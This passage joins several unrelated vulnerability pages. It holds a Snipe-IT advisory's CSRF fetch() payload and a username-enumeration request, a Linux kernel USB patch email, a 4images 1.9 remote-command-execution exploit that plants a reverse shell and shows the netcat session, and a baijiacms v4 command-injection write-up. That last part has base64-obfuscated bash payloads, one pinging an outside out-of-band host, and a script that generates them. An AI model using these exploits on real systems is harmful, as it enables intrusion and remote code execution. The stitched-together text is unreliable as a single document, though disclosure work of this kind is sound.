To execute the above payload one needs to replace the VALID\_CSRF\_TOKEN and VALID\_CATEGORY\_ID with valid values.

The adversary can then use the following payload to assign the malicious Accessory to a victim user:

    
    await fetch("http://SNIPE-IT-DOMAIN/accessories/ACCESSORY_ID/checkout", {
        "credentials": "include",
        "headers": {
            "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Accept-Language": "en-US,en;q=0.5",
            "Content-Type": "application/x-www-form-urlencoded",
            "Upgrade-Insecure-Requests": "1",
            "Sec-Fetch-Dest": "document",
            "Sec-Fetch-Mode": "navigate",
            "Sec-Fetch-Site": "same-origin",
            "Sec-Fetch-User": "?1",
            "Pragma": "no-cache",
            "Cache-Control": "no-cache"
        },
        "referrer": "http://SNIPE-IT-DOMAIN/accessories/ACCESSORY_ID/checkout",
        "body": "_token=VALID_CSRF_TOKEN&assigned_to=VICTIM_USER_ID&note=",
        "method": "POST",
        "mode": "cors"
    });
    

Please replace VALID\_CSRF\_TOKEN, VICTIM\_USER\_ID and ACCESSORY\_ID with the relevant values. ACCESSORY\_ID would be the identifier of the newly created malicious accessory. VICTIM\_USER\_ID would be another user's ID. For example the app creator is a privileged account and usually has the ID 1.

It is important to note that the payload can perform any action on the platform as the victim user, including elevating the permissions of the attacker (if the victim user is a privileged account).

**CVE-2022-44381 Vulnerability Details**

The password reset mechanism displays a different message based on whether the (attacker-controlled) input username exists in the user database or not. It is therefore possible for an attacker to fingerprint if a specific username exists in the deployed system or not.

The attacker needs to send a malicious POST request targeting /password/reset as shown below:

    
        "body" : "_token=XXX&password=password123&password_confirmation=password123&token=123&username=TARGET_USERNAME"
    

where "\_token" is a CSRF token obtained by a previous request, e.g. a failed post request to

/login

.

The functionality of reset() is as follows:

1.  It validates that the required FORM fields exist and are well formed. It does NOT verify however the validity of the RESET "token" (the random 123 value in our example).
2.  Checks if an activated user with this username exists in the user database.
    *   If so, it tries to reset the old password with the new one. This fails, since the token does not match the server issued token, and results to a redirect to an **error** page (line 119).
    *   If not, the application redirects to a **success** page (line 125).

    
        public function reset(Request $request)
        {
            $broker = $this->broker();
            $request->validate($this->rules(), $request->all(), $this->validationErrorMessages());
    
            // Check to see if the user even exists - we'll treat the response the same to prevent user sniffing
            if ($user = User::where('username', '=', $request->input('username'))->where('activated', '1')->whereNotNull('email')->first()) {
    
                // set the response
                $response = $broker->reset(
                    $this->credentials($request), function ($user, $password) {
                    $this->resetPassword($user, $password);
                });
    
                // Check if the password reset above actually worked
                if ($response == \Password::PASSWORD_RESET) {
                    return redirect()->guest('login')->with('success', trans('passwords.reset'));
                }
    
                \Log::debug('Password reset for '.$user->username.' FAILED - this user exists but the token is not valid');
    119:        return redirect()->back()->withInput($request->only('email'))->with('error', trans('passwords.token'));
            }
    
    
            \Log::debug('Password reset for '.$request->input('username').' FAILED - user does not exist or does not have an email address - but make it look like it succeeded');
    125:    return redirect()->guest('login')->with('success', trans('passwords.reset'));
        }
    

Therefore the attacker can infer whether a username exists in the database, based on the contents of the output page.

**Recommendation**

At the time of writing Snipe-IT has only addressed the XSS issues of CVE-2022-44380 in version 6.0.14. No patch is currently available for the user fingerprinting issue CVE-2022-44381. We will be updating this advisory if / when a patch arrives for CVE-2022-44381. CENSUS strongly recommends upgrading to version 6.0.14 (or greater) of Snipe-IT for the time being.

**Disclosure Timeline**

Vendor Contact:

November 8, 2022

CVE Allocation:

November 30, 2022

Vendor Fix Released:

December 9, 2022

Public Advisory:

December 23, 2022

CVE-2022-44381: CENSUS | IT Security Works

A flaw incorrect access control in the Linux kernel USB core subsystem was found in the way user attaches usb device. A local user could use this flaw to crash the system.

From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
To: linux-kernel@vger.kernel.org
Cc: Greg Kroah-Hartman <gregkh@linuxfoundation.org>,
	stable@vger.kernel.org, Alan Stern <stern@rowland.harvard.edu>,
	Rondreis <linhaoguo86@gmail.com>
Subject: \[PATCH 5.4 053/108\] USB: core: Prevent nested device-reset calls
Date: Tue, 13 Sep 2022 16:06:24 +0200	\[thread overview\]
Message-ID: <20220913140355.910732567@linuxfoundation.org> (raw)
In-Reply-To: <20220913140353.549108748@linuxfoundation.org\>

From: Alan Stern <stern@rowland.harvard.edu>

commit 9c6d778800b921bde3bff3cff5003d1650f942d1 upstream.

Automatic kernel fuzzing revealed a recursive locking violation in
usb-storage:

============================================
WARNING: possible recursive locking detected
5.18.0 #3 Not tainted
--------------------------------------------
kworker/1:3/1205 is trying to acquire lock:
ffff888018638db8 (&us\_interface\_key\[i\]){+.+.}-{3:3}, at:
usb\_stor\_pre\_reset+0x35/0x40 drivers/usb/storage/usb.c:230

but task is already holding lock:
ffff888018638db8 (&us\_interface\_key\[i\]){+.+.}-{3:3}, at:
usb\_stor\_pre\_reset+0x35/0x40 drivers/usb/storage/usb.c:230

...

stack backtrace:
CPU: 1 PID: 1205 Comm: kworker/1:3 Not tainted 5.18.0 #3
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
1.13.0-1ubuntu1.1 04/01/2014
Workqueue: usb\_hub\_wq hub\_event
Call Trace:
<TASK>
\_\_dump\_stack lib/dump\_stack.c:88 \[inline\]
dump\_stack\_lvl+0xcd/0x134 lib/dump\_stack.c:106
print\_deadlock\_bug kernel/locking/lockdep.c:2988 \[inline\]
check\_deadlock kernel/locking/lockdep.c:3031 \[inline\]
validate\_chain kernel/locking/lockdep.c:3816 \[inline\]
\_\_lock\_acquire.cold+0x152/0x3ca kernel/locking/lockdep.c:5053
lock\_acquire kernel/locking/lockdep.c:5665 \[inline\]
lock\_acquire+0x1ab/0x520 kernel/locking/lockdep.c:5630
\_\_mutex\_lock\_common kernel/locking/mutex.c:603 \[inline\]
\_\_mutex\_lock+0x14f/0x1610 kernel/locking/mutex.c:747
usb\_stor\_pre\_reset+0x35/0x40 drivers/usb/storage/usb.c:230
usb\_reset\_device+0x37d/0x9a0 drivers/usb/core/hub.c:6109
r871xu\_dev\_remove+0x21a/0x270 drivers/staging/rtl8712/usb\_intf.c:622
usb\_unbind\_interface+0x1bd/0x890 drivers/usb/core/driver.c:458
device\_remove drivers/base/dd.c:545 \[inline\]
device\_remove+0x11f/0x170 drivers/base/dd.c:537
\_\_device\_release\_driver drivers/base/dd.c:1222 \[inline\]
device\_release\_driver\_internal+0x1a7/0x2f0 drivers/base/dd.c:1248
usb\_driver\_release\_interface+0x102/0x180 drivers/usb/core/driver.c:627
usb\_forced\_unbind\_intf+0x4d/0xa0 drivers/usb/core/driver.c:1118
usb\_reset\_device+0x39b/0x9a0 drivers/usb/core/hub.c:6114

This turned out not to be an error in usb-storage but rather a nested
device reset attempt.  That is, as the rtl8712 driver was being
unbound from a composite device in preparation for an unrelated USB
reset (that driver does not have pre\_reset or post\_reset callbacks),
its ->remove routine called usb\_reset\_device() -- thus nesting one
reset call within another.

Performing a reset as part of disconnect processing is a questionable
practice at best.  However, the bug report points out that the USB
core does not have any protection against nested resets.  Adding a
reset\_in\_progress flag and testing it will prevent such errors in the
future.

Link: https://lore.kernel.org/all/CAB7eexKUpvX-JNiLzhXBDWgfg2T9e9\_0Tw4HQ6keN==voRbP0g@mail.gmail.com/
Cc: stable@vger.kernel.org
Reported-and-tested-by: Rondreis <linhaoguo86@gmail.com>
Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
Link: https://lore.kernel.org/r/YwkflDxvg0KWqyZK@rowland.harvard.edu
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
---
 drivers/usb/core/hub.c |   10 ++++++++++
 include/linux/usb.h    |    2 ++
 2 files changed, 12 insertions(+)

--- a/drivers/usb/core/hub.c
+++ b/drivers/usb/core/hub.c
@@ -5923,6 +5923,11 @@ re\_enumerate\_no\_bos:
  \* the reset is over (using their post\_reset method).
  \*
  \* Return: The same as for usb\_reset\_and\_verify\_device().
+ \* However, if a reset is already in progress (for instance, if a
+ \* driver doesn't have pre\_ or post\_reset() callbacks, and while
+ \* being unbound or re-bound during the ongoing reset its disconnect()
+ \* or probe() routine tries to perform a second, nested reset), the
+ \* routine returns -EINPROGRESS.
  \*
  \* Note:
  \* The caller must own the device lock.  For example, it's safe to use
@@ -5956,6 +5961,10 @@ int usb\_reset\_device(struct usb\_device \*
 		return -EISDIR;
 	}
 
+	if (udev->reset\_in\_progress)
+		return -EINPROGRESS;
+	udev->reset\_in\_progress = 1;
+
 	port\_dev = hub->ports\[udev->portnum - 1\];
 
 	/\*
@@ -6020,6 +6029,7 @@ int usb\_reset\_device(struct usb\_device \*
 
 	usb\_autosuspend\_device(udev);
 	memalloc\_noio\_restore(noio\_flag);
+	udev->reset\_in\_progress = 0;
 	return ret;
 }
 EXPORT\_SYMBOL\_GPL(usb\_reset\_device);
--- a/include/linux/usb.h
+++ b/include/linux/usb.h
@@ -580,6 +580,7 @@ struct usb3\_lpm\_parameters {
  \* @devaddr: device address, XHCI: assigned by HW, others: same as devnum
  \* @can\_submit: URBs may be submitted
  \* @persist\_enabled:  USB\_PERSIST enabled for this device
+ \* @reset\_in\_progress: the device is being reset
  \* @have\_langid: whether string\_langid is valid
  \* @authorized: policy has said we can use it;
  \*	(user space) policy determines if we authorize this device to be
@@ -665,6 +666,7 @@ struct usb\_device {
 
 	unsigned can\_submit:1;
 	unsigned persist\_enabled:1;
+	unsigned reset\_in\_progress:1;
 	unsigned have\_langid:1;
 	unsigned authorized:1;
 	unsigned authenticated:1;

next prev parent reply	other threads:\[~2022-09-13 15:01 UTC|newest\]

**Thread overview:** 114+ messages / expand\[flat|nested\]  mbox.gz  Atom feed  top
2022-09-13 14:05 \[PATCH 5.4 000/108\] 5.4.212-rc1 review Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 001/108\] efi: capsule-loader: Fix use-after-free in efi\_capsule\_write Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 002/108\] wifi: iwlegacy: 4965: corrected fix for potential off-by-one overflow in il4965\_rs\_fill\_link\_cmd() Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 003/108\] net: mvpp2: debugfs: fix memory leak when using debugfs\_lookup() Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 004/108\] fs: only do a memory barrier for the first set\_buffer\_uptodate() Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 005/108\] Revert "mm: kmemleak: take a full lowmem check in kmemleak\_\*\_phys()" Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 006/108\] net: dp83822: disable false carrier interrupt Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 007/108\] drm/msm/dsi: fix the inconsistent indenting Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 008/108\] drm/msm/dsi: Fix number of regulators for msm8996\_dsi\_cfg Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 009/108\] platform/x86: pmc\_atom: Fix SLP\_TYPx bitfield mask Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 010/108\] iio: adc: mcp3911: make use of the sign bit Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 011/108\] ieee802154/adf7242: defer destroy\_workqueue call Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 012/108\] wifi: cfg80211: debugfs: fix return type in ht40allow\_map\_read() Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 013/108\] Revert "xhci: turn off port power in shutdown" Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 014/108\] net: sched: tbf: dont call qdisc\_put() while holding tree lock Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 015/108\] ethernet: rocker: fix sleep in atomic context bug in neigh\_timer\_handler Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 016/108\] kcm: fix strp\_init() order and cleanup Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 017/108\] sch\_cake: Return \_\_NET\_XMIT\_STOLEN when consuming enqueued skb Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 018/108\] tcp: annotate data-race around challenge\_timestamp Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 019/108\] Revert "sch\_cake: Return \_\_NET\_XMIT\_STOLEN when consuming enqueued skb" Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 020/108\] net/smc: Remove redundant refcount increase Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 021/108\] serial: fsl\_lpuart: RS485 RTS polariy is inverse Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 022/108\] staging: rtl8712: fix use after free bugs Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 023/108\] powerpc: align syscall table for ppc32 Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 024/108\] vt: Clear selection before changing the font Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 025/108\] tty: serial: lpuart: disable flow control while waiting for the transmit engine to complete Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 026/108\] Input: iforce - wake up after clearing IFORCE\_XMIT\_RUNNING flag Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 027/108\] iio: adc: mcp3911: use correct formula for AD conversion Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 028/108\] misc: fastrpc: fix memory corruption on probe Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 029/108\] misc: fastrpc: fix memory corruption on open Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 030/108\] USB: serial: ftdi\_sio: add Omron CS1W-CIF31 device id Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 031/108\] binder: fix UAF of ref->proc caused by race condition Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 032/108\] usb: dwc3: qcom: fix use-after-free on runtime-PM wakeup Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 033/108\] drm/i915/reg: Fix spelling mistake "Unsupport" -> "Unsupported" Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 034/108\] clk: core: Honor CLK\_OPS\_PARENT\_ENABLE for clk gate ops Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 035/108\] Revert "clk: core: Honor CLK\_OPS\_PARENT\_ENABLE for clk gate ops" Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 036/108\] clk: core: Fix runtime PM sequence in clk\_core\_unprepare() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 037/108\] Input: rk805-pwrkey - fix module autoloading Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 038/108\] clk: bcm: rpi: Fix error handling of raspberrypi\_fw\_get\_rate Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 039/108\] hwmon: (gpio-fan) Fix array out of bounds access Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 040/108\] gpio: pca953x: Add mutex\_lock for regcache sync in PM Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 041/108\] thunderbolt: Use the actual buffer in tb\_async\_error() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 042/108\] xhci: Add grace period after xHC start to prevent premature runtime suspend Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 043/108\] USB: serial: cp210x: add Decagon UCA device id Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 044/108\] USB: serial: option: add support for OPPO R11 diag port Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 045/108\] USB: serial: option: add Quectel EM060K modem Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 046/108\] USB: serial: option: add support for Cinterion MV32-WA/WB RmNet mode Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 047/108\] usb: typec: altmodes/displayport: correct pin assignment for UFP receptacles Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 048/108\] usb: dwc2: fix wrong order of phy\_power\_on and phy\_init Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 049/108\] USB: cdc-acm: Add Icom PMR F3400 support (0c26:0020) Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 050/108\] usb-storage: Add ignore-residue quirk for NXP PN7462AU Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 051/108\] s390/hugetlb: fix prepare\_hugepage\_range() check for 2 GB hugepages Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 052/108\] s390: fix nospec table alignments Greg Kroah-Hartman
**2022-09-13 14:06 \` Greg Kroah-Hartman \[this message\]**
2022-09-13 14:06 \` \[PATCH 5.4 054/108\] usb: gadget: mass\_storage: Fix cdrom data transfers on MAC-OS Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 055/108\] driver core: Dont probe devices after bus\_type.match() probe deferral Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 056/108\] wifi: mac80211: Dont finalize CSA in IBSS mode if state is disconnected Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 057/108\] ip: fix triggering of icmp redirect Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 058/108\] net: mac802154: Fix a condition in the receive path Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 059/108\] ALSA: seq: oss: Fix data-race for max\_midi\_devs access Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 060/108\] ALSA: seq: Fix data-race at module auto-loading Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 061/108\] drm/i915/glk: ECS Liva Q2 needs GLK HDMI port timing quirk Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 062/108\] btrfs: harden identification of a stale device Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 063/108\] usb: dwc3: fix PHY disable sequence Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 064/108\] usb: dwc3: disable USB core PHY management Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 065/108\] USB: serial: ch341: fix lost character on LCR updates Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 066/108\] USB: serial: ch341: fix disabled rx timer on older devices Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 067/108\] scsi: megaraid\_sas: Fix double kfree() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 068/108\] drm/gem: Fix GEM handle release errors Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 069/108\] drm/amdgpu: Check num\_gfx\_rings for gfx v9\_0 rb setup Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 070/108\] drm/radeon: add a force flush to delay work when radeon Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 071/108\] parisc: ccio-dma: Handle kmalloc failure in ccio\_init\_resources() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 072/108\] parisc: Add runtime check to prevent PA2.0 kernels on PA1.x machines Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 073/108\] arm64: cacheinfo: Fix incorrect assignment of signed error value to unsigned fw\_level Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 074/108\] arm64/signal: Raise limit on stack frames Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 075/108\] fbdev: chipsfb: Add missing pci\_disable\_device() in chipsfb\_pci\_init() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 076/108\] drm/amdgpu: mmVM\_L2\_CNTL3 register not initialized correctly Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 077/108\] ALSA: emu10k1: Fix out of bounds access in snd\_emu10k1\_pcm\_channel\_alloc() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 078/108\] ALSA: aloop: Fix random zeros in capture data when using jiffies timer Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 079/108\] ALSA: usb-audio: Fix an out-of-bounds bug in \_\_snd\_usb\_parse\_audio\_interface() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 080/108\] kprobes: Prohibit probes in gate area Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 081/108\] debugfs: add debugfs\_lookup\_and\_remove() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 082/108\] nvmet: fix a use-after-free Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 083/108\] scsi: mpt3sas: Fix use-after-free warning Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 084/108\] scsi: lpfc: Add missing destroy\_workqueue() in error path Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 085/108\] cgroup: Optimize single thread migration Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 086/108\] cgroup: Elide write-locking threadgroup\_rwsem when updating csses on an empty subtree Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 087/108\] cgroup: Fix threadgroup\_rwsem <-> cpus\_read\_lock() deadlock Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 088/108\] smb3: missing inode locks in punch hole Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 089/108\] ARM: dts: imx6qdl-kontron-samx6i: remove duplicated node Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 090/108\] regulator: core: Clean up on enable failure Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 091/108\] RDMA/cma: Fix arguments order in net device validation Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 092/108\] soc: brcmstb: pm-arm: Fix refcount leak and \_\_iomem leak bugs Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 093/108\] RDMA/hns: Fix supported page size Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 094/108\] netfilter: br\_netfilter: Drop dst references before setting Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 095/108\] netfilter: nf\_conntrack\_irc: Fix forged IP logic Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 096/108\] rxrpc: Fix an insufficiently large sglist in rxkad\_verify\_packet\_2() Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 097/108\] afs: Use the operation issue time instead of the reply time for callbacks Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 098/108\] sch\_sfb: Dont assume the skb is still around after enqueueing to child Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 099/108\] tipc: fix shift wrapping bug in map\_get() Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 100/108\] i40e: Fix kernel crash during module removal Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 101/108\] RDMA/siw: Pass a pointer to virt\_to\_page() Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 102/108\] ipv6: sr: fix out-of-bounds read when setting HMAC data Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 103/108\] RDMA/mlx5: Set local port to one when accessing counters Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 104/108\] nvme-tcp: fix UAF when detecting digest errors Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 105/108\] tcp: fix early ETIMEDOUT after spurious non-SACK RTO Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 106/108\] sch\_sfb: Also store skb len before calling child enqueue Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 107/108\] x86/nospec: Fix i386 RSB stuffing Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 108/108\] MIPS: loongson32: ls1c: Fix hang during startup Greg Kroah-Hartman
2022-09-14  9:37 \` \[PATCH 5.4 000/108\] 5.4.212-rc1 review Sudip Mukherjee
2022-09-14 11:43 \` Naresh Kamboju
2022-09-14 20:19 \` Florian Fainelli
2022-09-15  0:14 \` Guenter Roeck
2022-09-17  3:06 \` zhouzhixiu

**Reply instructions:**

You may reply publicly to this message via plain-text email
using any one of the following methods:

\* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting\_style#Interleaved\_style

\* Reply using the **\--to**, **\--cc**, and **\--in-reply-to**
  switches of git-send-email(1):

  git send-email \\
    --in-reply-to=20220913140355.910732567@linuxfoundation.org \\
    --to=gregkh@linuxfoundation.org \\
    --cc=linhaoguo86@gmail.com \\
    --cc=linux-kernel@vger.kernel.org \\
    --cc=stable@vger.kernel.org \\
    --cc=stern@rowland.harvard.edu \\
    /path/to/YOUR\_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

\* If your mail client supports setting the **In-Reply-To** header
  via mailto: links, try the mailto: link

Be sure your reply has a **Subject:** header at the top and a blank line before the message body.

This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.

CVE-2022-4662: [PATCH 5.4 053/108] USB: core: Prevent nested device-reset calls

4images version 1.9 suffers from a remote command execution vulnerability.

    # Exploit Title: 4images 1.9 - Remote Command Execution# Exploit Author: Andrey Stoykov# Software Link: https://www.4homepages.de/download-4images# Version: 1.9# Tested on: Ubuntu 20.04To reproduce do the following:1. Login as administrator user2. Browse to "General" -> " Edit Templates" -> "Select Template Pack" -> "default_960px" -> "Load Theme"3. Select Template "categories.html"4. Paste reverse shell code5. Click "Save Changes"6. Browse to "http://host/4images/categories.php?cat_id=1"// HTTP POST request showing reverse shell payloadPOST /4images/admin/templates.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]__csrf=c39b7dea0ff15442681362d2a583c7a9&action=savetemplate&content=[REVERSE_SHELL_CODE]&template_file_name=categories.html&template_folder=default_960px[...]// HTTP redirect response to specific templateGET /4images/categories.php?cat_id=1 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]# nc -kvlp 4444listening on [any] 4444 ...connect to [127.0.0.1] from localhost [127.0.0.1] 43032Linux kali 6.0.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.7-1kali1 (2022-11-07) x86_64 GNU/Linux 13:54:28 up  2:18,  2 users,  load average: 0.09, 0.68, 0.56USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHATkali     tty7     :0               11:58    2:18m  2:21   0.48s xfce4-sessionkali     pts/1    -                11:58    1:40  24.60s  0.14s sudo suuid=1(daemon) gid=1(daemon) groups=1(daemon)/bin/sh: 0: can't access tty; job control turned off$

4images 1.9 Remote Command Execution

A Remote Code Execution (RCE) vulnerability was found in includes/baijiacms/common.inc.php in baijiacms v4.

项目地址：https://github.com/baijiacms/baijiacmsV4  
版本：V4.1.4 20170105 FINAL  
环境：

*   php 5.5.38
*   nginx 1.15
*   mysql 5.7.27
*   20.04.1-Ubuntu

漏洞点在文件includes/baijiacms/common.inc.php  
第654行。

**利用**

这个system的功能本来是为了执行压缩图片的。所以要利用该漏洞，需要先登录后台，在附近设置中设置图片压缩比例，否则代码无法运行到此处。

EXP1：http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/poc.;echo${IFS}cGluZyBwb2MuZXhyNm1xLmNleWUuaW8gLWMgNA==|base64${IFS}-d|bash;&status=1&beid=1

EXP2：http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/whoami.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;&status=1&beid=1

其中poc可以使用一下代码生成，随后开启web服务确保可以被访问到即可

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
18  
19  
20  

import base64  
  
cmd = input("cmd>>> ")   
  
b64cmd = base64.b64encode(cmd.encode()).decode()  
  
payload = f"echo {b64cmd}|base64 -d|bash"  
  
print(payload)  
payload = payload.replace(' ','${IFS}')  
print(payload)  
  
name = input("name>>>")  
payload = f"{name}.;{payload};"  
print(payload)  
  
with open(file=webpath+payload,mode='w')as f:  
    f.write('1')  
  
  

**原理**

在该漏洞中，漏洞点为文件includes/baijiacms/common.inc.php  
第654行的system()。该函数位于file\_save()函数中。

1  

system('convert'.$quality\_command.' '.$file\_full\_path.' '.$file\_full\_path);  

其中，$quality\_command无法控制，能够控制的只有$file\_full\_path。

由于上一步调用file\_save()的，是fetch\_net\_file\_upload()函数的return部分

$file\_full\_path的定义往上翻为：

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  

$file\_full\_path = WEB\_ROOT .$path . $extpath. $filename;  
  
  
$path = '/attachment/';  
$extpath\="{$extention}/" . date('Y/m/');  
$filename = random(15) . ".{$extention}";  
  
  
$extention = pathinfo($url,PATHINFO\_EXTENSION );  
  

所以能使用的payload只能存在于url后的文件名后缀中，且payload中由于代码功能的限制不能出现，

*   htmlspecialchars()
    
    *   includes/baijiacms.php line92 :$\_GP = irequestsplite($\_GP);
